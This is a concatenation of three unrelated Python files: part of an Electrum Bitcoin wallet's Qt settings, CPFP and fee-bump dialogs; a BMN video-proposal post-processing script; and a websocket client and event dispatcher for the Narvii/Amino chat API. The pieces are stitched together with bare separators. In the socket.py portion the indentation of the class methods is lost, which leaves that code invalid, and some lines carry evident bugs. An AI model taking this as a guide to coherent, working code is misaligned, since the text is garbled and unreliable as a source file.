    qr_label = HelpLabel(_('Video Device') + ':', msg)
    qr_combo.setEnabled(qrscanner.libzbar is not None)
    on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
    qr_combo.currentIndexChanged.connect(on_video_device)
    gui_widgets.append((qr_label, qr_combo))
    # color theme (needs restart)
    colortheme_combo = QComboBox()
    colortheme_combo.addItem(_('Light'), 'default')
    colortheme_combo.addItem(_('Dark'), 'dark')
    index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
    colortheme_combo.setCurrentIndex(index)
    colortheme_label = QLabel(_('Color theme') + ':')
    def on_colortheme(x):
        self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
        self.need_restart = True
    colortheme_combo.currentIndexChanged.connect(on_colortheme)
    gui_widgets.append((colortheme_label, colortheme_combo))
    # change-address behavior
    usechange_cb = QCheckBox(_('Use change addresses'))
    usechange_cb.setChecked(self.wallet.use_change)
    if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
    def on_usechange(x):
        usechange_result = x == Qt.Checked
        if self.wallet.use_change != usechange_result:
            self.wallet.use_change = usechange_result
            self.wallet.storage.put('use_change', self.wallet.use_change)
            multiple_cb.setEnabled(self.wallet.use_change)
    usechange_cb.stateChanged.connect(on_usechange)
    usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
    tx_widgets.append((usechange_cb, None))
    def on_multiple(x):
        multiple = x == Qt.Checked
        if self.wallet.multiple_change != multiple:
            self.wallet.multiple_change = multiple
            self.wallet.storage.put('multiple_change', multiple)
    multiple_change = self.wallet.multiple_change
    multiple_cb = QCheckBox(_('Use multiple change addresses'))
    multiple_cb.setEnabled(self.wallet.use_change)
    multiple_cb.setToolTip('\n'.join([
        _('In some cases, use up to 3 change addresses in order to break '
          'up large coin amounts and obfuscate the recipient address.'),
        _('This may result in higher transactions fees.')
    ]))
    multiple_cb.setChecked(multiple_change)
    multiple_cb.stateChanged.connect(on_multiple)
    tx_widgets.append((multiple_cb, None))
    # coin selection policy (only shown when more than one chooser exists)
    def fmt_docs(key, klass):
        lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
        return '\n'.join([key, "", " ".join(lines)])
    choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
    if len(choosers) > 1:
        chooser_name = coinchooser.get_name(self.config)
        msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
        msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
        chooser_label = HelpLabel(_('Coin selection') + ':', msg)
        chooser_combo = QComboBox()
        chooser_combo.addItems(choosers)
        i = choosers.index(chooser_name) if chooser_name in choosers else 0
        chooser_combo.setCurrentIndex(i)
        def on_chooser(x):
            chooser_name = choosers[chooser_combo.currentIndex()]
            self.config.set_key('coin_chooser', chooser_name)
        chooser_combo.currentIndexChanged.connect(on_chooser)
        tx_widgets.append((chooser_label, chooser_combo))
    def on_unconf(x):
        self.config.set_key('confirmed_only', bool(x))
    conf_only = self.config.get('confirmed_only', False)
    unconf_cb = QCheckBox(_('Spend only confirmed coins'))
    unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
    unconf_cb.setChecked(conf_only)
    unconf_cb.stateChanged.connect(on_unconf)
    tx_widgets.append((unconf_cb, None))
    def on_outrounding(x):
        self.config.set_key('coin_chooser_output_rounding', bool(x))
    enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
    outrounding_cb = QCheckBox(_('Enable output value rounding'))
    outrounding_cb.setToolTip(
        _('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
        _('This might improve your privacy somewhat.') + '\n' +
        _('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
    outrounding_cb.setChecked(enable_outrounding)
    outrounding_cb.stateChanged.connect(on_outrounding)
    tx_widgets.append((outrounding_cb, None))
    # Fiat Currency
    hist_checkbox = QCheckBox()
    hist_capgains_checkbox = QCheckBox()
    fiat_address_checkbox = QCheckBox()
    ccy_combo = QComboBox()
    ex_combo = QComboBox()
    def update_currencies():
        if not self.fx: return
        currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
        ccy_combo.clear()
        ccy_combo.addItems([_('None')] + currencies)
        if self.fx.is_enabled():
            ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
    def update_history_cb():
        if not self.fx: return
        hist_checkbox.setChecked(self.fx.get_history_config())
        hist_checkbox.setEnabled(self.fx.is_enabled())
    def update_fiat_address_cb():
        if not self.fx: return
        fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
    def update_history_capgains_cb():
        if not self.fx: return
        hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
        hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
    def update_exchanges():
        if not self.fx: return
        b = self.fx.is_enabled()
        ex_combo.setEnabled(b)
        if b:
            h = self.fx.get_history_config()
            c = self.fx.get_currency()
            exchanges = self.fx.get_exchanges_by_ccy(c, h)
        else:
            exchanges = self.fx.get_exchanges_by_ccy('USD', False)
        # block signals while repopulating to avoid spurious on_exchange calls
        ex_combo.blockSignals(True)
        ex_combo.clear()
        ex_combo.addItems(sorted(exchanges))
        ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
        ex_combo.blockSignals(False)
    def on_currency(hh):
        if not self.fx: return
        b = bool(ccy_combo.currentIndex())  # index 0 is _('None')
        ccy = str(ccy_combo.currentText()) if b else None
        self.fx.set_enabled(b)
        if b and ccy != self.fx.ccy:
            self.fx.set_currency(ccy)
        update_history_cb()
        update_exchanges()
        self.update_fiat()
    def on_exchange(idx):
        exchange = str(ex_combo.currentText())
        if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
            self.fx.set_exchange(exchange)
    def on_history(checked):
        if not self.fx: return
        self.fx.set_history_config(checked)
        update_exchanges()
        self.history_list.refresh_headers()
        if self.fx.is_enabled() and checked:
            self.fx.trigger_update()
        update_history_capgains_cb()
    def on_history_capgains(checked):
        if not self.fx: return
        self.fx.set_history_capital_gains_config(checked)
        self.history_list.refresh_headers()
    def on_fiat_address(checked):
        if not self.fx: return
        self.fx.set_fiat_address_config(checked)
        self.address_list.refresh_headers()
        self.address_list.update()
    # populate fiat controls from current FX state, then wire up handlers
    update_currencies()
    update_history_cb()
    update_history_capgains_cb()
    update_fiat_address_cb()
    update_exchanges()
    ccy_combo.currentIndexChanged.connect(on_currency)
    hist_checkbox.stateChanged.connect(on_history)
    hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
    fiat_address_checkbox.stateChanged.connect(on_fiat_address)
    ex_combo.currentIndexChanged.connect(on_exchange)
    fiat_widgets = []
    fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
    fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
    fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
    fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
    fiat_widgets.append((QLabel(_('Source')), ex_combo))
    # assemble the tab pages; a (label, widget) pair spans two grid columns,
    # a (widget, None) pair spans the full row
    tabs_info = [
        (fee_widgets, _('Fees')),
        (tx_widgets, _('Transactions')),
        (gui_widgets, _('Appearance')),
        (fiat_widgets, _('Fiat')),
        (id_widgets, _('Identity')),
    ]
    for widgets, name in tabs_info:
        tab = QWidget()
        grid = QGridLayout(tab)
        grid.setColumnStretch(0,1)
        for a,b in widgets:
            i = grid.rowCount()
            if b:
                if a:
                    grid.addWidget(a, i, 0)
                grid.addWidget(b, i, 1)
            else:
                grid.addWidget(a, i, 0, 1, 2)
        tabs.addTab(tab, name)
    vbox.addWidget(tabs)
    vbox.addStretch(1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.setLayout(vbox)
    # run the dialog
    d.exec_()
    if self.fx:
        self.fx.trigger_update()
    self.alias_received_signal.disconnect(set_alias_color)
    run_hook('close_settings_dialog')
    if self.need_restart:
        self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close hook; clean_up() must run exactly once even though Qt has
    been observed to deliver this event twice in rare cases."""
    first_close = not self.cleaned_up
    if first_close:
        self.cleaned_up = True
        self.clean_up()
    event.accept()
def clean_up(self):
    """Persist window state and release resources; invoked once from closeEvent."""
    self.wallet.thread.stop()
    if self.network:
        self.network.unregister_callback(self.on_network)
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        # remember geometry only when not maximized, so restore is sensible
        g = self.geometry()
        self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
                                              g.width(),g.height()])
    # keep only the most recent 50 console commands
    self.config.set_key("console-history", self.console.history[-50:],
                        True)
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Modal dialog listing plugins: an enable checkbox, an optional per-plugin
    settings widget, and a help button per row."""
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400,250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0,1)
    w.setLayout(grid)
    settings_widgets = {}
    def enable_settings_widget(p, name, i):
        # lazily create the plugin's settings widget the first time the
        # (loaded) plugin needs one; keep it enabled only while the plugin is
        widget = settings_widgets.get(name)
        if not widget and p and p.requires_settings():
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
        if widget:
            widget.setEnabled(bool(p and p.is_enabled()))
    def do_toggle(cb, name, i):
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        full_name = descr['__name__']
        prefix, _separator, name = full_name.rpartition('.')
        p = plugins.get(name)
        # keystore plugins (hardware wallets) are managed elsewhere
        if descr.get('registers_keystore'):
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                          or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # a broken plugin must not prevent the dialog from opening
            self.print_msg("error: cannot display plugin", name)
            traceback.print_exc(file=sys.stdout)
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp(self, parent_tx, new_tx):
    """Child-Pays-For-Parent dialog.

    parent_tx: the stuck unconfirmed transaction.
    new_tx:    a draft child transaction spending one of its outputs back to
               this wallet; the user picks the fee, then the signed child is
               shown for broadcast.
    """
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    # the child's output value is the ceiling for the fee we can attach
    max_fee = new_tx.output_value()
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    def f(x):
        # live-update the remaining output amount as the fee is edited
        a = max_fee - fee_e.get_amount()
        output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
    fee_e.textChanged.connect(f)
    # initial fee proposal: configured fee/kB applied to combined size
    fee = self.config.fee_per_kb() * total_size / 1000
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
    grid.addWidget(fee_e, 3, 1)
    def on_rate(dyn, pos, fee_rate):
        fee = fee_rate * total_size / 1000
        fee = min(max_fee, fee)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    fee = fee_e.get_amount()
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    new_tx = self.wallet.cpfp(parent_tx, fee)
    # RBF deliberately disabled in this fork
    # new_tx.set_rbf(True)
    new_tx.set_rbf(False)
    self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
    """Fee-bump dialog for an unconfirmed transaction *tx*.

    Proposes 1.5x the current fee, lets the user adjust it with a slider,
    then shows the replacement transaction for signing/broadcast.
    """
    is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
    if fee is None:
        self.show_error(_("Can't bump fee: unknown fee for original transaction."))
        return
    tx_label = self.wallet.get_label(tx.txid())
    tx_size = tx.estimated_size()
    d = WindowModalDialog(self, _('Bump Fee'))
    vbox = QVBoxLayout(d)
    vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
    vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
    vbox.addWidget(QLabel(_('New fee' + ':')))
    fee_e = BTCAmountEdit(self.get_decimal_point)
    fee_e.setAmount(fee * 1.5)  # default proposal: 50% higher than current fee
    vbox.addWidget(fee_e)
    def on_rate(dyn, pos, fee_rate):
        fee = fee_rate * tx_size / 1000
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    vbox.addWidget(fee_slider)
    cb = QCheckBox(_('Final'))
    vbox.addWidget(cb)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    is_final = cb.isChecked()
    new_fee = fee_e.get_amount()
    delta = new_fee - fee
    if delta < 0:
        self.show_error("fee too low")
        return
    try:
        new_tx = self.wallet.bump_fee(tx, delta)
    except CannotBumpFee as e:
        self.show_error(str(e))
        return
    # RBF deliberately disabled in this fork, so the replacement is always final
    #if is_final:
    #    new_tx.set_rbf(True)
    new_tx.set_rbf(False)
    self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
    """Add an offline transaction *tx* to the wallet history.

    Returns True on success, False if the transaction conflicts with the
    existing history or cannot be added.
    """
    win = self.top_level_window()
    try:
        if not self.wallet.add_transaction(tx.txid(), tx):
            win.show_error(_("Transaction could not be saved.") + "\n" +
                           _("It conflicts with current history."))
            return False
    except AddTransactionException as e:
        # NOTE(review): passes the exception object rather than str(e);
        # relies on show_error stringifying its argument — confirm.
        win.show_error(e)
        return False
    else:
        self.wallet.save_transactions(write=True)
        # need to update at least: history_list, utxo_list, address_list
        self.need_update.set()
        msg = (_("Transaction added to wallet history.") + '\n\n' +
               _("Note: this is an offline transaction, if you want the network "
                 "to see it, you need to broadcast it."))
        win.msg_box(QPixmap(":icons/offline_tx.png"), None, _('Success'), msg)
        return True
|
post_processing.py
|
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import json
import multiprocessing as mp
from utils import iou_with_anchors
def load_json(file):
    """Parse *file* as JSON and return the decoded object."""
    with open(file) as fp:
        return json.load(fp)
def getDatasetDict(opt):
    """Build the validation-subset video dictionary for post-processing.

    opt: options dict providing "video_anno" (per-video annotations keyed by
         prefixed video name) and "video_info" (JSON with a 'database' section
         keyed by the unprefixed name, holding 'resolution' and 'url').

    Returns {video_name: video_info} for videos whose 'subset' contains
    "validation", with 'resolution' and 'url' merged in from video_info.
    (The previous implementation carried ~15 lines of dead commented-out
    code, removed here.)
    """
    subset = "validation"
    anno_database1 = load_json(opt["video_anno"])
    anno_database2 = load_json(opt["video_info"])
    anno_database2 = anno_database2['database']
    video_dict = {}
    for video_name, video_info in anno_database1.items():
        # annotation keys carry a 2-char prefix (e.g. "v_") that the
        # info database does not use — strip it for the lookup
        temp_dict = anno_database2[video_name[2:]]
        video_info['resolution'] = temp_dict['resolution']
        video_info['url'] = temp_dict['url']
        if subset in video_info['subset']:
            video_dict[video_name] = video_info
    return video_dict
def soft_nms(df, alpha, t1, t2):
    '''
    Soft non-maximum suppression over temporal proposals.

    df: proposals generated by network (columns score/xmin/xmax);
    alpha: alpha value of Gaussian decaying function;
    t1, t2: threshold for soft nms (interpolated by proposal width).

    Returns a new DataFrame (score/xmin/xmax) of at most ~100 selected
    proposals, in selection order.
    '''
    df = df.sort_values(by="score", ascending=False)
    tstart = list(df.xmin.values[:])
    tend = list(df.xmax.values[:])
    tscore = list(df.score.values[:])
    rstart = []
    rend = []
    rscore = []
    # NOTE(review): `len(tscore) > 1` means the final surviving proposal is
    # never emitted; this matches the upstream BMN code — confirm before
    # "fixing", since results depend on it.
    while len(tscore) > 1 and len(rscore) < 101:
        max_index = tscore.index(max(tscore))
        # IoU of every remaining proposal against the current best one
        tmp_iou_list = iou_with_anchors(
            np.array(tstart),
            np.array(tend), tstart[max_index], tend[max_index])
        for idx in range(0, len(tscore)):
            if idx != max_index:
                tmp_iou = tmp_iou_list[idx]
                tmp_width = tend[max_index] - tstart[max_index]
                # width-dependent IoU threshold; overlapping proposals get
                # their score decayed by a Gaussian instead of being dropped
                if tmp_iou > t1 + (t2 - t1) * tmp_width:
                    tscore[idx] = tscore[idx] * np.exp(-np.square(tmp_iou) /
                                                       alpha)
        # move the current best proposal into the result lists
        rstart.append(tstart[max_index])
        rend.append(tend[max_index])
        rscore.append(tscore[max_index])
        tstart.pop(max_index)
        tend.pop(max_index)
        tscore.pop(max_index)
    newDf = pd.DataFrame()
    newDf['score'] = rscore
    newDf['xmin'] = rstart
    newDf['xmax'] = rend
    return newDf
def video_post_process(opt, video_list, video_dict):
    """Worker: run soft-NMS over each video's BMN proposals and store the
    top-100 rescaled segments.

    Results are written into `result_dict`, a module-global (a
    multiprocessing.Manager dict injected by BMN_post_processing) keyed by
    the video name without its 2-char prefix.
    """
    for video_name in video_list:
        df = pd.read_csv("./output/BMN_results/" + video_name + ".csv")
        if len(df) > 1:
            snms_alpha = opt["soft_nms_alpha"]
            snms_t1 = opt["soft_nms_low_thres"]
            snms_t2 = opt["soft_nms_high_thres"]
            df = soft_nms(df, snms_alpha, snms_t1, snms_t2)
        df = df.sort_values(by="score", ascending=False)
        video_info = video_dict[video_name]
        # effective duration: frame count snapped down to a multiple of 16
        # (the feature window), converted back to seconds
        video_duration = float(video_info["duration_frame"] // 16 * 16) / video_info["duration_frame"] * video_info[
            "duration_second"]
        proposal_list = []
        for j in range(min(100, len(df))):
            tmp_proposal = {}
            tmp_proposal["score"] = df.score.values[j]
            # proposals are in [0, 1]; clamp and rescale to seconds
            tmp_proposal["segment"] = [max(0, df.xmin.values[j]) * video_duration,
                                       min(1, df.xmax.values[j]) * video_duration]
            proposal_list.append(tmp_proposal)
        result_dict[video_name[2:]] = proposal_list
def BMN_post_processing(opt):
    """Post-process BMN proposals for all validation videos in parallel and
    write an ActivityNet-style result JSON.

    opt: options dict providing "post_process_thread" (worker count),
         soft-NMS thresholds (consumed by video_post_process) and
         "result_file" (output path).

    Fix vs. previous version: the result file is now opened with a context
    manager, so the handle is closed even if json.dump raises.
    """
    video_dict = getDatasetDict(opt)
    video_list = list(video_dict.keys())  # [:100]
    # shared dict so worker processes can publish their results
    global result_dict
    result_dict = mp.Manager().dict()
    num_videos = len(video_list)
    num_videos_per_thread = num_videos // opt["post_process_thread"]
    processes = []
    for tid in range(opt["post_process_thread"] - 1):
        tmp_video_list = video_list[tid * num_videos_per_thread:(tid + 1) * num_videos_per_thread]
        p = mp.Process(target=video_post_process, args=(opt, tmp_video_list, video_dict))
        p.start()
        processes.append(p)
    # the last worker takes the remainder of the list
    tmp_video_list = video_list[(opt["post_process_thread"] - 1) * num_videos_per_thread:]
    p = mp.Process(target=video_post_process, args=(opt, tmp_video_list, video_dict))
    p.start()
    processes.append(p)
    for p in processes:
        p.join()
    result_dict = dict(result_dict)
    output_dict = {"version": "VERSION 1.3", "results": result_dict, "external_data": {}}
    with open(opt["result_file"], "w") as outfile:
        json.dump(output_dict, outfile)
|
socket.py
|
import time
import json
import websocket
import threading
import contextlib
from sys import _getframe as getframe
from .lib.util import objects
class SocketHandler:
def __init__(self, client, socket_trace = False, debug = False):
    """Wrap the Narvii websocket connection for *client*.

    client: owning API client; supplies device_id / sid for auth headers and
            handle_socket_message() for dispatch.
    socket_trace: forwarded to websocket.enableTrace() when run() is called.
    debug: when True, print verbose socket lifecycle messages.
    """
    # websocket.enableTrace(True)
    self.socket_url = "wss://ws1.narvii.com"
    self.client = client
    self.debug = debug
    self.active = True          # connection believed usable
    self.headers = None         # auth headers, filled in by start()
    self.socket = None          # websocket.WebSocketApp, created by start()
    self.socket_thread = None
    self.reconnect = True       # keeps reconnect_handler's loop alive
    self.socket_stop = False
    self.socketDelay = 0        # seconds since last (re)connect, advanced by the watchdog
    self.socket_trace = socket_trace
    self.socketDelayFetch = 60 # Reconnects every 60 seconds.
    #threading.Thread(target=self.reconnect_handler).start()
    #websocket.enableTrace(socket_trace)
def run(self):
    """Start the reconnect watchdog thread and apply the trace setting."""
    watchdog = threading.Thread(target=self.reconnect_handler)
    watchdog.start()
    websocket.enableTrace(self.socket_trace)
def reconnect_handler(self):
# Made by enchart#3410 thx
# Fixed by The_Phoenix#3967
# Fixed by enchart again lmao
# Fixed by Phoenix one more time lol
while True:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay : {self.socketDelay}")
if self.socketDelay >= self.socketDelayFetch and self.active:
if self.debug:
print(f"[socket][reconnect_handler] socketDelay >= {self.socketDelayFetch}, Reconnecting Socket")
self.close()
self.start()
self.socketDelay = 0
self.socketDelay += 5
if not self.reconnect:
if self.debug:
print(f"[socket][reconnect_handler] reconnect is False, breaking")
break
time.sleep(5)
def on_open(self):
if self.debug:
print("[socket][on_open] Socket Opened")
def on_close(self):
if self.debug:
print("[socket][on_close] Socket Closed")
self.active = False
if self.reconnect:
if self.debug:
print("[socket][on_close] reconnect is True, Opening Socket")
def on_ping(self, data):
if self.debug:
print("[socket][on_ping] Socket Pinged")
contextlib.suppress(self.socket.sock.pong(data))
def handle_message(self, data):
self.client.handle_socket_message(data)
return
def send(self, data):
if self.debug:
print(f"[socket][send] Sending Data : {data}")
self.socket.send(data)
def start(self):
if self.debug:
print(f"[socket][start] Starting Socket")
self.headers = {
"NDCDEVICEID": self.client.device_id,
"NDCAUTH": f"sid={self.client.sid}"
}
self.socket = websocket.WebSocketApp(
f"{self.socket_url}/?signbody={self.client.device_id}%7C{int(time.time() * 1000)}",
on_message = self.handle_message,
on_open = self.on_open,
on_close = self.on_close,
on_ping = self.on_ping,
header = self.headers
)
threading.Thread(target = self.socket.run_forever, kwargs = {"ping_interval": 60}).start()
self.reconnect = True
self.active = True
if self.debug:
print(f"[socket][start] Socket Started")
def close(self):
if self.debug:
print(f"[socket][close] Closing Socket")
self.reconnect = False
self.active = False
self.socket_stop = True
try:
self.socket.close()
except Exception as closeError:
if self.debug:
print(f"[socket][close] Error while closing Socket : {closeError}")
return
class Callbacks:
    """Dispatch incoming socket frames to user-registered event handlers.

    Frames are routed twice: first on the top-level ``"t"`` field
    (``self.methods``), then — for chat messages — on a
    ``"type:mediaType"`` key into ``self.chat_methods``.  Every ``on_*``
    method forwards the event to the callbacks registered under its own
    method name via the ``event`` decorator.
    """
    def __init__(self, client):
        self.client = client
        # event name -> list of user callback functions registered via event()
        self.handlers = {}
        # top-level dispatch on the frame's "t" field
        self.methods = {
            304: self._resolve_chat_action_start,
            306: self._resolve_chat_action_end,
            1000: self._resolve_chat_message
        }
        # "type:mediaType" -> handler for chat message frames (t == 1000)
        self.chat_methods = {
            "0:0": self.on_text_message,
            "0:100": self.on_image_message,
            "0:103": self.on_youtube_message,
            "1:0": self.on_strike_message,
            "2:110": self.on_voice_message,
            "3:113": self.on_sticker_message,
            "50:0": self.TYPE_USER_SHARE_EXURL,
            "51:0": self.TYPE_USER_SHARE_USER,
            "52:0": self.on_voice_chat_not_answered,
            "53:0": self.on_voice_chat_not_cancelled,
            "54:0": self.on_voice_chat_not_declined,
            "55:0": self.on_video_chat_not_answered,
            "56:0": self.on_video_chat_not_cancelled,
            "57:0": self.on_video_chat_not_declined,
            "58:0": self.on_avatar_chat_not_answered,
            "59:0": self.on_avatar_chat_not_cancelled,
            "60:0": self.on_avatar_chat_not_declined,
            "100:0": self.on_delete_message,
            "101:0": self.on_group_member_join,
            "102:0": self.on_group_member_leave,
            "103:0": self.on_chat_invite,
            "104:0": self.on_chat_background_changed,
            "105:0": self.on_chat_title_changed,
            "106:0": self.on_chat_icon_changed,
            "107:0": self.on_voice_chat_start,
            "108:0": self.on_video_chat_start,
            "109:0": self.on_avatar_chat_start,
            "110:0": self.on_voice_chat_end,
            "111:0": self.on_video_chat_end,
            "112:0": self.on_avatar_chat_end,
            "113:0": self.on_chat_content_changed,
            "114:0": self.on_screen_room_start,
            "115:0": self.on_screen_room_end,
            "116:0": self.on_chat_host_transfered,
            "117:0": self.on_text_message_force_removed,
            "118:0": self.on_chat_removed_message,
            "119:0": self.on_text_message_removed_by_admin,
            "120:0": self.on_chat_tip,
            "121:0": self.on_chat_pin_announcement,
            "122:0": self.on_voice_chat_permission_open_to_everyone,
            "123:0": self.on_voice_chat_permission_invited_and_requested,
            "124:0": self.on_voice_chat_permission_invite_only,
            "125:0": self.on_chat_view_only_enabled,
            "126:0": self.on_chat_view_only_disabled,
            "127:0": self.on_chat_unpin_announcement,
            "128:0": self.on_chat_tipping_enabled,
            "129:0": self.on_chat_tipping_disabled,
            "65281:0": self.on_timestamp_message,
            "65282:0": self.on_welcome_message,
            "65283:0": self.on_invite_message
        }
        self.chat_actions_start = {
            "Typing": self.on_user_typing_start,
        }
        self.chat_actions_end = {
            "Typing": self.on_user_typing_end,
        }

    def _resolve_chat_message(self, data):
        # mediaType defaults to 0 (plain/none) when absent from the payload.
        key = f"{data['o']['chatMessage']['type']}:{data['o']['chatMessage'].get('mediaType', 0)}"
        return self.chat_methods.get(key, self.default)(data)

    def _resolve_chat_action_start(self, data):
        # NOTE(review): reads 'actions' with an int default next to string
        # keys like "Typing" — confirm the payload field name against the API.
        key = data['o'].get('actions', 0)
        return self.chat_actions_start.get(key, self.default)(data)

    def _resolve_chat_action_end(self, data):
        key = data['o'].get('actions', 0)
        return self.chat_actions_end.get(key, self.default)(data)

    def resolve(self, data):
        # Entry point: raw JSON text from the socket -> typed dispatch.
        data = json.loads(data)
        return self.methods.get(data["t"], self.default)(data)

    def call(self, type, data):
        # Invoke every user callback registered under this event name.
        if type in self.handlers:
            for handler in self.handlers[type]:
                handler(data)

    def event(self, type):
        # Decorator: register `handler` for the event name `type`.
        def registerHandler(handler):
            if type in self.handlers:
                self.handlers[type].append(handler)
            else:
                self.handlers[type] = [handler]
            return handler
        return registerHandler

    # Each handler below looks up its own function name at runtime via
    # getframe(0).f_code.co_name and dispatches to the callbacks registered
    # under that name — do not rename these methods.
    def on_text_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_image_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_youtube_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_strike_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_voice_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_sticker_message(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def TYPE_USER_SHARE_EXURL(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def TYPE_USER_SHARE_USER(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_voice_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_voice_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_voice_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_video_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_video_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_video_chat_not_declined(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_avatar_chat_not_answered(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
    def on_avatar_chat_not_cancelled(self, data): self.call(getframe(0).f_code.co_name, objects.Event(data["o"]).Event)
